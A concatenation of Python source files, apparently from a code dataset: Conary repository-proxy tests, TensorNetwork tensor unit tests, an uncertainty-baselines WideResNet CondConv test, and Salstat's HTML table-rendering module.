csPath = origChangesetCache.hashKey(slf, key)
if csPath in slf.locksMap:
slf.llf.write("Releasing lock for %s\n" % csPath)
return origChangesetCache.set(slf, key, value)
def resetLocks(slf):
for csPath in sorted(slf.locksMap):
slf.llf.write("Resetting unused lock for %s\n" % csPath)
return origChangesetCache.resetLocks(slf)
self.mock(netreposproxy, 'ChangesetCache', MockChangesetCache)
cfg = netserver.ServerConfig()
cfg.changesetCacheDir = os.path.join(self.workDir, "changesetCache")
cfg.proxyContentsDir = os.path.join(self.workDir, "proxyContents")
prs = netreposproxy.ProxyRepositoryServer(cfg, "/someUrl")
rawUrl = '/blah'
headers = {'X-Conary-Proxy-Host' : 'repos.example.com'}
prs.setBaseUrlOverride(rawUrl, headers, isSecure = True)
# callWrapper normally sets this, but nothing here invokes it
prs._serverName = 'repos.example.com'
caller = mock.mockClass(netreposproxy.ProxyCaller)()
caller._getBasicUrl._mock.setDefaultReturn('http://blah')
caller.checkVersion._mock.setDefaultReturn([51, 52, 53])
# Make sure we present the fingerprints in non-sorted order, we need
# to verify we sort them
suf = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'
fingerprints = ['aac3aac3' + suf, 'aaa1aaa1' + suf, 'aab2aab2' + suf]
caller.getChangeSetFingerprints._mock.setDefaultReturn(fingerprints)
csSizes = [ 12, 13, 14 ]
allInfo = [
(str(x), 'trovesNeeded%d' % i, 'filesNeeded%d' % i,
'removedTroves%d' % i, str(x))
for i, x in enumerate(csSizes) ]
csFileObj = file(os.path.join(self.workDir, "changeset"), "w+")
magic = netreposproxy.filecontainer.FILE_CONTAINER_MAGIC
fver = netreposproxy.filecontainer.FILE_CONTAINER_VERSION_FILEID_IDX
fver = netreposproxy.filecontainer.struct.pack("!I", fver)
for i, csSize in enumerate(csSizes):
csFileObj.write(magic)
csFileObj.write(fver)
rest = csSize - len(magic) - len(fver)
csFileObj.write((chr(ord('a') + i) * rest))
csFileObj.seek(0)
changeSetList = [ (x, (None, None), (None, None), False) for x in
['a', 'b', 'c'] ]
caller.getChangeSet._mock.appendReturn(
('http://repos.example.com/my-changeset-url', allInfo),
53, changeSetList, False, True, False, True, 2007022001,
False, False)
urlOpener = mock.MockObject()
uo = mock.MockObject()
self.mock(netreposproxy.transport, 'ConaryURLOpener', urlOpener)
urlOpener._mock.setDefaultReturn(uo)
uo.open._mock.appendReturn(
csFileObj,
'http://repos.example.com/my-changeset-url',
forceProxy=caller._lastProxy,
headers=[('X-Conary-Servername', 'repos.example.com')])
authToken = AuthToken(None, None, [])
clientVersion = 51
prs.getChangeSet(caller, authToken, clientVersion, changeSetList,
recurse = False, withFiles = True, withFileContents = False,
excludeAutoSource = True)
MockChangesetCache.llf.close()
f = file(lockLogFile)
contents = [ x.strip() for x in f ]
sortedFP = sorted(fingerprints)
logEntries1 = contents[:len(fingerprints)]
self.assertEqual(logEntries1,
[ 'Lock acquired for %s/%s/%s-2007022001.1' %
(cfg.changesetCacheDir, fp[:2], fp[2:])
for fp in sortedFP ])
logEntries2 = contents[len(fingerprints):2 * len(fingerprints)]
self.assertEqual(logEntries2,
[ 'Releasing lock for %s/%s/%s-2007022001.1' %
(cfg.changesetCacheDir, fp[:2], fp[2:])
for fp in fingerprints ])
# We're not releasing locks we didn't close
self.assertEqual(len(contents), 2 * len(fingerprints))
class ProxyTest(rephelp.RepositoryHelper):
def _getRepos(self, proxyRepos):
hostname = 'localhost1'
label = self.cfg.buildLabel.asString().replace('localhost', hostname)
repos = self.openRepository(1, useSSL = True, forceSSL = True)
return repos, label, hostname
@runproxy(entitlements = [ ('localhost1', 'ent1234') ])
def testInjectedEntitlements(self, proxyRepos):
repos, label, hostname = self._getRepos(proxyRepos)
repos.addRole(label, 'entgroup')
repos.addAcl(label, 'entgroup', None, None)
repos.addEntitlementClass(hostname, 'entgroup', 'entgroup')
repos.addEntitlementKeys(hostname, 'entgroup', [ 'ent1234' ])
repos.deleteUserByName(label, 'anonymous')
repos.deleteUserByName(label, 'test')
# since both users have been erased from the repository, this can
# only work if the entitlement got added by the proxy
proxyRepos.c[hostname].checkVersion()
def testInjectedEntitlementsNonSSL(self):
# CNY-3176
# We are trying to force the situation where an entitlement was
# injected for a server running on the default http port (80, but the
# URL not specifying it).
self.cfg.entitlement.append(('example.com', 'sikrit'))
authToken = AuthToken('test', 'foo', [], '127.0.0.1')
caller = netreposproxy.ProxyCallFactory.createCaller('unused', 'unused',
'http://example.com/conary', proxyMap = self.cfg.getProxyMap(),
authToken = authToken, localAddr = '1.2.3.4',
protocolString = "protocolString", headers = {}, cfg = self.cfg,
targetServerName = 'example.com', remoteIp = '5.6.7.8',
isSecure = False, baseUrl = "http://blah", systemId='foo')
self.assertEquals(caller.url.scheme, 'https')
self.assertEquals(caller.url.hostport.port, 443)
# This whole thing points out a workaround for _not_ going through SSL
# if you choose so: add a repositoryMap that explicitly adds :80 to
# the server URL.
@runproxy(users = [ ('localhost1', 'otheruser', 'pw') ])
def testUserOverrides(self, proxyRepos):
repos, label, hostname = self._getRepos(proxyRepos)
self.addUserAndRole(repos, label, 'otheruser', 'pw')
repos.addAcl(label, 'otheruser', None, None)
repos.deleteUserByName(label, 'anonymous')
repos.deleteUserByName(label, 'test')
# since both users have been erased from the repository, this can
# only work if the 'other' user is added in by the proxy
proxyRepos.c[hostname].checkVersion()
def testTruncatedChangesets(self):
"""
Test that a proxy will not cache a changeset that has been truncated in
transit.
"""
# Get a proxy server and a repository server both with changeset caches.
self.stopRepository(2)
repos = self.openRepository(2)
reposServer = self.servers.getCachedServer(2)
proxyServer = self.getConaryProxy()
proxyServer.start()
try:
cfg = copy.deepcopy(self.cfg)
proxyServer.addToConfig(cfg)
client = conaryclient.ConaryClient(cfg)
proxyRepos = client.getRepos()
trv = self.addComponent('foo:data', '/localhost2@rpl:linux/1-1-1',
repos=repos)
jobList = [ (trv.getName(), (None, None),
(trv.getVersion(), trv.getFlavor()), True) ]
# First populate the repository (not proxy) cscache
kwargs = dict(recurse=False, withFiles=True, withFileContents=True,
excludeAutoSource=False)
cs = repos.createChangeSet(jobList, **kwargs)
# Now corrupt the changeset and try to pull it through the proxy
# cache. Unfortunately the simplest way to do this is to truncate
# the contents file which is transcluded into the changeset. We get
# the path to that using the file contents sha1 from the changeset
# we fetched earlier.
assert len(cs.files) == 1
sha1 = ThawFile(cs.files.values()[0], None).contents.sha1()
sha1 = sha1.encode('hex')
path = os.path.join(reposServer.contents.getPath(),
sha1[:2], sha1[2:4], sha1[4:])
os.rename(path, path + '.old')
with open(path, 'w') as f:
f.write('hahaha')
# At this point, fetching a changeset through the proxy should fail.
err = self.assertRaises(errors.RepositoryError,
proxyRepos.createChangeSet, jobList, **kwargs)
if 'truncated' not in str(err) and 'corrupted' not in str(err):
self.fail("Unexpected error when fetching truncated "
"changeset: %s" % str(err))
# If we put the file back, it should succeed.
os.rename(path + '.old', path)
proxyRepos.createChangeSet(jobList, **kwargs)
finally:
proxyServer.stop()
self.stopRepository(2)
@runproxy(memcache=True)
def testProxyCaching(self, proxyRepos):
raise testcase.SkipTestException("fails randomly")
ver0 = "/localhost1@rpl:linux/1-1-1"
trv0 = self.addComponent("foo:data", ver0, filePrimer = 1)
trv = proxyRepos.getTrove(*trv0.getNameVersionFlavor())
deps = proxyRepos.getDepsForTroveList([ trv.getNameVersionFlavor() ],
provides = True, requires = True)
ti = proxyRepos.getTroveInfo(trove._TROVEINFO_TAG_SOURCENAME,
[ trv.getNameVersionFlavor() ])
self.stopRepository(1)
trv1 = proxyRepos.getTrove(*trv0.getNameVersionFlavor())
deps1 = proxyRepos.getDepsForTroveList([ trv.getNameVersionFlavor() ],
provides = True, requires = True)
ti1 = proxyRepos.getTroveInfo(trove._TROVEINFO_TAG_SOURCENAME,
[ trv.getNameVersionFlavor() ])
self.assertEquals(trv, trv1)
self.assertEquals(deps, deps1)
self.assertEquals(ti, ti1)
# we reopen it for proper cleanup in the runproxy() decorator
self.openRepository(1)
| apache-2.0 | 2,241,642,500,559,587,600 | 41.23053 | 117 | 0.612423 | false |
google/TensorNetwork | tensornetwork/tests/tensor_test.py | 1 | 14595 | # Copyright 2019 The TensorNetwork Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
import numpy as np
import jax
import jax.numpy as jnp
from jax import config
import tensorflow as tf
import torch
import pytest
import tensornetwork
from tensornetwork.backends import abstract_backend
from tensornetwork import backends, backend_contextmanager
from tensornetwork.tests import testing_utils
from tensornetwork import ncon_interface
#pylint: disable=no-member
config.update("jax_enable_x64", True)
BaseBackend = abstract_backend.AbstractBackend
@pytest.mark.parametrize("dtype", testing_utils.np_all_dtypes)
def test_init_tensor_from_numpy_array(backend, dtype):
""" Creates a numpy array, initializes a Tensor from it, and checks that all
its members have been correctly initialized.
"""
A, init = testing_utils.safe_zeros((2, 3, 1), backend, dtype)
if A is None:
return
assert A.backend.name == backend
np.testing.assert_allclose(A.array, init)
assert A.shape == init.shape
assert A.size == init.size
assert A.ndim == init.ndim
@pytest.mark.parametrize("dtype", testing_utils.torch_supported_dtypes)
def test_init_tensor_default_backend(dtype):
""" Creates a numpy array, initializes a Tensor from it, and checks that all
its members have been correctly initialized.
"""
backend = backend_contextmanager.get_default_backend()
backend_obj = backends.backend_factory.get_backend(backend)
shape = (3, 5, 2)
testA = backend_obj.zeros(shape, dtype=dtype)
init = np.zeros(shape, dtype=dtype)
A = tensornetwork.Tensor(init)
assert A.backend.name == backend
np.testing.assert_allclose(A.array, testA)
assert A.shape == testA.shape
assert A.size == testA.size
assert A.ndim == testA.ndim
@pytest.mark.parametrize("dtype", testing_utils.np_all_dtypes)
def test_init_tensor_from_backend_array(backend, dtype):
"""
Creates an instance of the backend's array class, initializes a Tensor from
it, and checks that all its members have been correctly initialized.
"""
shape = (2, 3, 1)
if backend == "pytorch":
if dtype not in testing_utils.torch_supported_dtypes:
with pytest.raises(TypeError):
dtype = testing_utils.np_dtype_to_backend(backend, dtype)
return
dtype = testing_utils.np_dtype_to_backend(backend, dtype)
init = torch.zeros(shape, dtype=dtype)
elif backend == "numpy":
dtype = testing_utils.np_dtype_to_backend(backend, dtype)
init = np.zeros(shape, dtype=dtype)
elif backend == "jax":
dtype = testing_utils.np_dtype_to_backend(backend, dtype)
init = jnp.zeros(shape, dtype=dtype)
elif backend == "tensorflow":
dtype = testing_utils.np_dtype_to_backend(backend, dtype)
init = tf.zeros(shape, dtype=dtype)
else:
raise ValueError("Unexpected backend ", backend)
A = tensornetwork.Tensor(init, backend=backend)
assert A.backend.name == backend
np.testing.assert_allclose(A.array, init)
assert A.shape == init.shape
assert A.size == np.prod(init.shape)
assert A.ndim == init.ndim
@pytest.mark.parametrize("dtype", testing_utils.np_all_dtypes)
def test_tensor_dtype(backend, dtype):
""" Checks that Tensor.dtype works.
"""
shape = (2, 3, 1)
A, init = testing_utils.safe_zeros(shape, backend, dtype)
if A is None:
return
if backend != "pytorch":
assert A.dtype == init.dtype
else:
assert A.dtype == torch.tensor(init).dtype
@pytest.mark.parametrize("dtype", testing_utils.np_all_dtypes)
def test_tensor_T(backend, dtype):
""" Checks that Tensor.T works.
"""
shape = (2, 3, 1)
A, init = testing_utils.safe_randn(shape, backend, dtype)
if A is not None:
np.testing.assert_allclose(A.T.array, init.T)
@pytest.mark.parametrize("dtype", testing_utils.np_not_bool)
def test_tensor_H(backend, dtype):
""" Checks that Tensor.H works.
"""
shape = (2, 3, 1)
A, init = testing_utils.safe_randn(shape, backend, dtype)
if A is not None:
np.testing.assert_allclose(A.H.array, init.conj().T)
@pytest.mark.parametrize("dtype", testing_utils.np_not_bool)
def test_tensor_conj(backend, dtype):
""" Checks that Tensor.conj() works.
"""
shape = (2, 3, 1)
A, init = testing_utils.safe_randn(shape, backend, dtype)
if A is not None:
np.testing.assert_allclose(A.conj().array, A.backend.conj(init))
@pytest.mark.parametrize("dtype", testing_utils.np_not_bool)
def test_tensor_conjugate(backend, dtype):
""" Checks that Tensor.conjugate() works.
"""
shape = (2, 3, 1)
A, init = testing_utils.safe_randn(shape, backend, dtype)
if A is not None:
np.testing.assert_allclose(A.conjugate().array, A.backend.conj(init))
@pytest.mark.parametrize("dtype", testing_utils.np_all_dtypes)
def test_tensor_copy(backend, dtype):
""" Checks that Tensor.copy() works.
"""
shape = (2, 3, 1)
A, init = testing_utils.safe_randn(shape, backend, dtype)
if A is not None:
np.testing.assert_allclose(A.copy().array, init.copy())
@pytest.mark.parametrize("dtype", testing_utils.np_all_dtypes)
def test_tensor_reshape(backend, dtype):
""" Checks that Tensor.copy() works.
"""
shape = (2, 3, 1)
newshape = (6, 1)
A, init = testing_utils.safe_randn(shape, backend, dtype)
if A is not None:
np.testing.assert_allclose(A.reshape(newshape).array,
init.reshape(newshape))
@pytest.mark.parametrize("dtype", testing_utils.np_all_dtypes)
def test_tensor_transpose(backend, dtype):
""" Checks that Tensor.transpose() works.
"""
shape = (2, 3, 1)
permutation = (1, 2, 0)
A, init = testing_utils.safe_randn(shape, backend, dtype)
if A is not None:
test = A.backend.convert_to_tensor(init)
test = A.backend.transpose(test, perm=permutation)
np.testing.assert_allclose(A.transpose(perm=permutation).array, test)
@pytest.mark.parametrize("dtype", testing_utils.np_all_dtypes)
def test_tensor_squeeze(backend, dtype):
""" Checks that Tensor.squeeze() works.
"""
shape = (2, 3, 1)
A, init = testing_utils.safe_randn(shape, backend, dtype)
if A is not None:
np.testing.assert_allclose(A.squeeze().array, init.squeeze())
@pytest.mark.parametrize("dtype", testing_utils.np_all_dtypes)
def test_tensor_ravel(backend, dtype):
""" Checks that Tensor.ravel() works.
"""
shape = (2, 3, 1)
A, init = testing_utils.safe_randn(shape, backend, dtype)
if A is not None:
np.testing.assert_allclose(A.ravel().array, init.ravel())
@pytest.mark.parametrize("dtype", testing_utils.np_all_dtypes)
def test_tensor_flatten(backend, dtype):
""" Checks that Tensor.flatten() works.
"""
shape = (2, 3, 1)
A, init = testing_utils.safe_randn(shape, backend, dtype)
if A is not None:
np.testing.assert_allclose(A.flatten().array, init.flatten())
@pytest.mark.parametrize("dtype", testing_utils.np_not_bool)
def test_tensor_hconj(backend, dtype):
""" Checks that Tensor.hconj() works.
"""
shape = (2, 3, 1)
permutation = (1, 2, 0)
A, init = testing_utils.safe_randn(shape, backend, dtype)
if A is not None:
test = A.backend.convert_to_tensor(init)
test = A.backend.transpose(A.backend.conj(test), perm=permutation)
np.testing.assert_allclose(A.hconj(perm=permutation).array, test)
@pytest.mark.parametrize("dtype", testing_utils.np_float_dtypes)
def test_tensor_multiply(backend, dtype):
""" Checks that Tensor*Tensor works.
"""
shape = (2, 3, 1)
A, initA = testing_utils.safe_randn(shape, backend, dtype)
B, initB = testing_utils.safe_randn(shape, backend, dtype)
if A is not None:
testA = A.backend.convert_to_tensor(initA)
testB = B.backend.convert_to_tensor(initB)
result = A * B
result2 = A.backend.multiply(testA, testB)
np.testing.assert_allclose(result.array, result2)
@pytest.mark.parametrize("dtype", testing_utils.np_float_dtypes)
def test_tensor_scalar_multiply(backend, dtype):
""" Checks that Tensor*scalar works.
"""
shape = (2, 3, 1)
A, initA = testing_utils.safe_randn(shape, backend, dtype)
B = 2.
if A is not None:
testA = A.backend.convert_to_tensor(initA)
result = A * B
result2 = A.backend.multiply(testA, B)
np.testing.assert_allclose(result.array, result2)
@pytest.mark.parametrize("dtype", testing_utils.np_float_dtypes)
def test_tensor_scalar_rmultiply(backend, dtype):
""" Checks that scalar*Tensor works.
"""
shape = (2, 3, 1)
A, initA = testing_utils.safe_randn(shape, backend, dtype)
B = 2.
if A is not None:
testA = A.backend.convert_to_tensor(initA)
result = B * A
result2 = A.backend.multiply(B, testA)
np.testing.assert_allclose(result.array, result2)
@pytest.mark.parametrize("dtype", testing_utils.np_float_dtypes)
def test_tensor_divide(backend, dtype):
""" Checks that Tensor/Tensor works.
"""
shape = (2, 3, 1)
A, initA = testing_utils.safe_randn(shape, backend, dtype)
B, _ = testing_utils.safe_zeros(shape, backend, dtype)
if A is not None:
B = B + 1
testA = A.backend.convert_to_tensor(initA)
result = A / B
result2 = A.backend.divide(testA, B.array)
np.testing.assert_allclose(result.array, result2)
@pytest.mark.parametrize("dtype", testing_utils.np_float_dtypes)
def test_tensor_scalar_divide(backend, dtype):
""" Checks that Tensor/scalar works.
"""
shape = (2, 3, 1)
A, initA = testing_utils.safe_randn(shape, backend, dtype)
B = 2.
if A is not None:
testA = A.backend.convert_to_tensor(initA)
result = A / B
result2 = A.backend.divide(testA, B)
np.testing.assert_allclose(result.array, result2)
@pytest.mark.parametrize("dtype", testing_utils.np_float_dtypes)
def test_tensor_addition(backend, dtype):
""" Checks that Tensor+Tensor works.
"""
shape = (2, 3, 1)
A, initA = testing_utils.safe_randn(shape, backend, dtype)
B, initB = testing_utils.safe_randn(shape, backend, dtype)
if A is not None:
testA = A.backend.convert_to_tensor(initA)
testB = B.backend.convert_to_tensor(initB)
result = A + B
result2 = A.backend.addition(testA, testB)
np.testing.assert_allclose(result.array, result2)
@pytest.mark.parametrize("dtype", testing_utils.np_float_dtypes)
def test_tensor_scalar_addition(backend, dtype):
""" Checks that Tensor+scalar works.
"""
shape = (2, 3, 1)
A, initA = testing_utils.safe_randn(shape, backend, dtype)
B = 2.
if A is not None:
testA = A.backend.convert_to_tensor(initA)
result = A + B
result2 = A.backend.addition(testA, B)
np.testing.assert_allclose(result.array, result2)
@pytest.mark.parametrize("dtype", testing_utils.np_float_dtypes)
def test_tensor_scalar_raddition(backend, dtype):
""" Checks that scalar+Tensor works.
"""
shape = (2, 3, 1)
A, initA = testing_utils.safe_randn(shape, backend, dtype)
B = 2.
if A is not None:
testA = A.backend.convert_to_tensor(initA)
result = B + A
result2 = A.backend.addition(B, testA)
np.testing.assert_allclose(result.array, result2)
@pytest.mark.parametrize("dtype", testing_utils.np_float_dtypes)
def test_tensor_subtraction(backend, dtype):
""" Checks that Tensor-Tensor works.
"""
shape = (2, 3, 1)
A, initA = testing_utils.safe_randn(shape, backend, dtype)
B, initB = testing_utils.safe_randn(shape, backend, dtype)
if A is not None:
testA = A.backend.convert_to_tensor(initA)
testB = B.backend.convert_to_tensor(initB)
result = A - B
result2 = A.backend.subtraction(testA, testB)
np.testing.assert_allclose(result.array, result2)
@pytest.mark.parametrize("dtype", testing_utils.np_float_dtypes)
def test_tensor_scalar_subtraction(backend, dtype):
""" Checks that Tensor-scalar works.
"""
shape = (2, 3, 1)
A, initA = testing_utils.safe_randn(shape, backend, dtype)
B = 2.
if A is not None:
testA = A.backend.convert_to_tensor(initA)
result = A - B
result2 = A.backend.subtraction(testA, B)
np.testing.assert_allclose(result.array, result2)
@pytest.mark.parametrize("dtype", testing_utils.np_float_dtypes)
def test_tensor_scalar_rsubtraction(backend, dtype):
""" Checks that scalar-Tensor works.
"""
shape = (2, 3, 1)
A, initA = testing_utils.safe_randn(shape, backend, dtype)
B = 2.
if A is not None:
testA = A.backend.convert_to_tensor(initA)
result = B - A
result2 = A.backend.subtraction(B, testA)
np.testing.assert_allclose(result.array, result2)
@pytest.mark.parametrize("dtype", testing_utils.np_float_dtypes)
def test_tensor_matmul(backend, dtype):
""" Checks that Tensor@Tensor works.
"""
shape = (3, 3)
A, initA = testing_utils.safe_randn(shape, backend, dtype)
B, initB = testing_utils.safe_randn(shape, backend, dtype)
if A is not None and B is not None:
testA = A.backend.convert_to_tensor(initA)
testB = B.backend.convert_to_tensor(initB)
result = A @ B
result2 = A.backend.matmul(testA, testB)
np.testing.assert_allclose(result.array, result2)
@pytest.mark.parametrize("dtype", testing_utils.np_float_dtypes)
def test_tensor_ops_raise(dtype):
""" Checks that tensor operators raise the right error.
"""
shape = (2, 3, 1)
A, _ = testing_utils.safe_randn(shape, "numpy", dtype)
B, _ = testing_utils.safe_randn(shape, "jax", dtype)
with pytest.raises(ValueError):
_ = A * B
with pytest.raises(ValueError):
_ = A + B
with pytest.raises(ValueError):
_ = A - B
with pytest.raises(ValueError):
_ = A / B
with pytest.raises(ValueError):
_ = A @ B
def test_ncon_builder(backend):
a, _ = testing_utils.safe_randn((2, 2, 2), backend, np.float32)
b, _ = testing_utils.safe_randn((2, 2, 2), backend, np.float32)
c, _ = testing_utils.safe_randn((2, 2, 2), backend, np.float32)
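  # Calling a tensor with axis labels wraps it for ncon; chaining the wrappers
  # with @ accumulates the tensor and axis lists into a single builder.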
tmp = a(2, 1, -1)
assert tmp.tensors[0] is a
assert tmp.axes[0] == [2, 1, -1]
builder = a(2, 1, -1) @ b(2, 3, -2) @ c(1, 3, -3)
assert builder.tensors == [a, b, c]
assert builder.axes == [[2, 1, -1], [2, 3, -2], [1, 3, -3]]
np.testing.assert_allclose(
ncon_interface.ncon(
[a, b, c],
[[2, 1, -1], [2, 3, -2], [1, 3, -3]],
backend=backend).array,
ncon_interface.finalize(builder).array)
| apache-2.0 | 6,652,985,649,632,117,000 | 32.321918 | 78 | 0.685303 | false |
google/uncertainty-baselines | uncertainty_baselines/models/wide_resnet_condconv_test.py | 1 | 2177 | # coding=utf-8
# Copyright 2021 The Uncertainty Baselines Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for WRN 28-10 with Monte Carlo dropout."""
import tensorflow as tf
import uncertainty_baselines as ub
class WideResnetCondConvTest(tf.test.TestCase):
def testWideResnetCondConv(self):
tf.random.set_seed(83922)
dataset_size = 15
batch_size = 5
input_shape = (32, 32, 1)
num_classes = 2
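    # Synthetic classification data: labels are drawn from logits given by a
    # fixed linear map of the flattened inputs.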
features = tf.random.normal((dataset_size,) + input_shape)
coeffs = tf.random.normal([tf.reduce_prod(input_shape), num_classes])
net = tf.reshape(features, [dataset_size, -1])
logits = tf.matmul(net, coeffs)
labels = tf.random.categorical(logits, 1)
dataset = tf.data.Dataset.from_tensor_slices((features, labels))
dataset = dataset.repeat().shuffle(dataset_size).batch(batch_size)
model = ub.models.wide_resnet_condconv(
input_shape=input_shape,
depth=10,
width_multiplier=1,
num_classes=num_classes,
l2=0.,
num_experts=5,
per_core_batch_size=batch_size,
use_cond_dense=True,
reduce_dense_outputs=True,
cond_placement='all',
routing_fn='softmax',
normalize_routing=False,
normalize_dense_routing=False,
top_k=-1,
routing_pooling='flatten')
model.compile(
'adam',
loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True))
history = model.fit(
dataset, steps_per_epoch=dataset_size // batch_size, epochs=2)
loss_history = history.history['loss']
self.assertAllGreaterEqual(loss_history, 0.)
if __name__ == '__main__':
tf.test.main()
| apache-2.0 | 8,842,494,253,316,627,000 | 31.984848 | 77 | 0.678916 | false |
salmoni/Salstat | tabler.py | 1 | 7586 | """
tabler.py
Creates tables in HTML for Salstat
Submit a list of [heading: value] pairs in the desired order
p-values are automatically formatted as %1.6f (all other floats as %5.3f?)
The first two routines are generic and for single answer results.
Following are a handful of tabler functions for particular tests
(c) 2013, Alan James Salmoni
"""
def tableANOVAWithin(results):
    ln1 = '<table class="table table-striped">\n'
headhtml = '<tr><th>Variable</th><th>Source</th><th>Sum of squares</th><th>DF</th><th>Mean square</th><th>F</th><th>p</th></tr>\n'
l1vars = ("Name",results["SSbet"],results["DFbet"],results["MSbet"],results["F"],results["p"])
l2vars = (results["SSwit"],results["DFwit"],results["MSwit"])
l3vars = (results["SSres"],results["DFres"],results["MSres"])
l4vars = (results["SSint"])
l5vars = (results["SStot"],results["DFtot"])
line1 = '<tr><td>%s</td><td>Between groups</td><td>%.3f</td><td>%d</td><td>%.3f</td><td>%.3f</td><td>%1.4f</td></tr>\n'%(l1vars)
line2 = '<tr><td></td><td>Within groups</td><td>%.3f</td><td>%d</td><td>%.3f</td><td></td><td></td></tr>\n'%(l2vars)
line3 = '<tr><td></td><td>Residual</td><td>%.3f</td><td>%d</td><td>%.3f</td><td></td><td></td></tr>\n'%(l3vars)
line4 = '<tr><td></td><td>Interaction</td><td>%.3f</td><td></td><td></td><td></td><td></td></tr>\n'%(l4vars)
line5 = '<tr><td></td><td>Total</td><td>%.3f</td><td>%d</td><td></td><td></td><td></td></tr>\n'%(l5vars)
line = ln1+headhtml+line1+line3+line4+line2+line5+'</table>'
return line
def tableANOVABetween(results):
    ln1 = '<table class="table table-striped">\n'
headhtml = '<tr><th>Variable</th><th>Source</th><th>Sum of squares</th><th>DF</th><th>Mean square</th><th>F</th><th>p</th></tr>\n'
l1vars = ("Name",results["SSbet"],results["DFbet"],results["MSbet"],results["F"],results["p"])
l2vars = (results["SSwit"],results["DFerr"],results["MSerr"])
l3vars = (results["SStot"],results["DFtot"])
line1 = '<tr><td>%s</td><td>Between groups</td><td>%.3f</td><td>%d</td><td>%.3f</td><td>%.3f</td><td>%1.4f</td></tr>\n'%(l1vars)
line2 = '<tr><td></td><td>Within groups</td><td>%.3f</td><td>%d</td><td>%.3f</td></tr>\n'%(l2vars)
line3 = '<tr><td></td><td>Total</td><td>%.3f</td><td>%d</td></tr>\n'%(l3vars)
line = ln1+headhtml+line1+line2+line3+'</table>'
return line
def table(ListofLists):
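    """Render a two-row HTML table from [heading, value] pairs: headings in
    the first row, type-formatted values in the second."""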
ln1 = '<table class="table table-striped"><tr>'
ln2 = '<tr>'
for List in ListofLists:
key = List[0]
val = List[1]
headhtml = '<th>%s</th>'%key
if key == 'p':
try:
foothtml = '<td>%1.6f</td>'%val
except TypeError:
foothtml = '<td>n/a</td>'
elif type(val) is int:
foothtml = '<td>%d</td>'%val
elif (type(val) is str):
foothtml = '<td>%s</td>'%val
#elif type(val) is float:
else:
fltstr = str(val)
foothtml = '<td>%s</td>'%fltstr
# really need to figure out what parameters make a good display for each number
ln1 = ln1 + headhtml
ln2 = ln2 + foothtml
ln1 = ln1 + '</tr>' + ln2 + '</tr>\n</table>\n'
return ln1
def vtable(List):
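    """Render one HTML table row: List[0] is the row label, the remaining
    elements become data cells formatted by type."""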
key = List[0]
vals = List[1:]
btn_id = ' id="%s"'%key
chartbutton = '<a class="btn btn-mini dropdown-toggle"%s data-toggle="dropdown" \
href="#">Chart</a>\n'%btn_id
linehtml = '<tr><td>%s</td>'%(key)
for val in vals:
        if key == 'p':
            try:
                linehtml = linehtml + '<td>%1.6f</td>'%val
            except TypeError:
                linehtml = linehtml + '<td>n/a</td>'
elif type(val) is int:
linehtml = linehtml + '<td>%d</td>'%val
elif (type(val) is str):
linehtml = linehtml + '<td>%s</td>'%val
elif type(val) is float:
linehtml = linehtml + '<td>%s</td>'%str(val)
elif type(val) is tuple:
print ("TUPLE!", val)
else:
try:
linehtml = linehtml + '<td>%s</td>'%str(val)
except:
pass
linehtml = linehtml + '</tr>\n'
return linehtml
def tableHinges(List):
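    """Render one HTML table row of (lower, upper) hinge pairs for a variable."""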
key = List[0]
vals = List[1:]
linehtml = '<tr><td>%s</td>'%(key)
for val in vals:
linehtml += '<td>%s, %s</td>'%(str(val[0]), str(val[1]))
linehtml += '</tr>\n'
return linehtml
def tableMultiples(vals, varName):
table = '<h3>%s</h3><table class="table table-striped">\n'%varName
table += '\t<tr><th>Value</th>'
try:
if vals['freqs']:
table += '<th>Frequencies</th>'
except ValueError:
table += '<th>Frequencies</th>'
try:
if vals['props']:
table += '<th>Proportions</th>'
except ValueError:
table += '<th>Proportions</th>'
try:
if vals['percs']:
table += '<th>Percentages</th>'
except ValueError:
table += '<th>Percentages</th>'
table += '</tr>\n'
N = len(vals['values'])
for idx in range(N):
table += '\t<tr><td>%s</td>'%vals['values'][idx]
try:
if vals['freqs']:
table += '<td>%s</td>'%vals['freqs'][idx]
except ValueError:
table += '<td>%s</td>'%vals['freqs'][idx]
try:
if vals['props']:
table += '<td>%s</td>'%vals['props'][idx]
except ValueError:
table += '<td>%s</td>'%vals['props'][idx]
try:
if vals['percs']:
table += '<td>%s %%</td>'%vals['percs'][idx]
except ValueError:
table += '<td>%s %%</td>'%vals['percs'][idx]
table += '</tr>\n'
table += '</table>\n'
return table
def tableFrequencies(List):
    table = ''  # each variable in List gets its own table below
for var in List:
values = var[0]
freqs = var[1]
table += '<table class="table table-striped">\n'
table += '\t<tr><th>Value</th><th>Frequency</th></tr>\n'
for idx, row in enumerate(values):
table += '\t<tr><td>%s</td><td>%s</td></tr>\n'%(str(row),str(freqs[idx]))
table += '</table>\n'
return table
def tableProportions(List):
"""
Passes two arrays in a list:
array 1 = value
array 2 = corresponding proportions
"""
table = ''
for turn in List:
vals = turn[0]
props = turn[1]
table += '<table class="table table-striped">\n'
table += '\t<tr><th>Value</th><th>Proportion</th></tr>\n'
for idx, val in enumerate(vals):
table += '\t<tr><td>%s</td><td>%s</td></tr>\n'%(str(val),str(props[idx]))
table += '</table>\n'
return table
def tableMode(List):
"""
Produces a table to display modes.
Passed are two arrays:
1 = frequency
2 = modal values
"""
table = '<h3>Mode</h3>\n<table class="table table-striped">\n'
table += '\t<tr><th>Frequency</th><th>Modal values</th></tr>\n'
for turn in List:
freq = turn[0]
vals = turn[1]
table += '\t<tr><td>%s</td><td>%s<br />'%(str(freq), str(vals[0]))
for idx in range(1, len(vals)):
table += '\t%s<br />\n'%(str(vals[idx]))
table += '</td></tr>\n\t<tr><td></td><td></td></tr>\n'
